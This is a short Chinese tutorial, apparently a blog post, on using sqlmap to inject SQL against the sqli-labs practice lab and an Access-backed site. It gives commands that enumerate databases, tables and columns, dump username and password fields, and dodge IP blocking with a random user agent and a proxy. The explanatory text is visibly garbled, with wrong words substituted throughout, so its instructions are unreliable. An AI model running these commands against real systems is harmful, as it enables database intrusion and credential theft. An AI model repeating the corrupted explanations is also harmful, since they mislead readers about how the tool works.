Mysql数据库
1、先检测是否能够注入,先判断是否能够失常注入:
sqlmap -u url -v 3
外面有个留神的点url前面必须是可注入的参数?id=之类的,否则url检测会有问题
对于某些明天url能够在/a/b.html尝试退出号来进行此门路内的检测
2、爆库
sqlmap.py -u http://sqli-labs-master/Less-… -v 3 –dbs –batch
3、依据爆进去的库查表
sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” –tables –batch
4、依据表查字段
sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” -T “users” –columns –batch
5、依据字段查值
sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” -T “users” -C “username,password” –dump –batch
避免被IP拦挡的操作,random-agent让申请头随机:
能够在前面减少–proxy http://127.0.0.1:8080 –random-agent -v 3
Access
对于Access数据库,间接报表就OK
sqlmap -u “http://192.168.96.16/shownews.asp?id=23” –tables
sqlmap外面的字典地位,内置字典地位为,能够依据本人的须要更改,对于Access个别就是间接暴库
sqlmap\data\txt
发表回复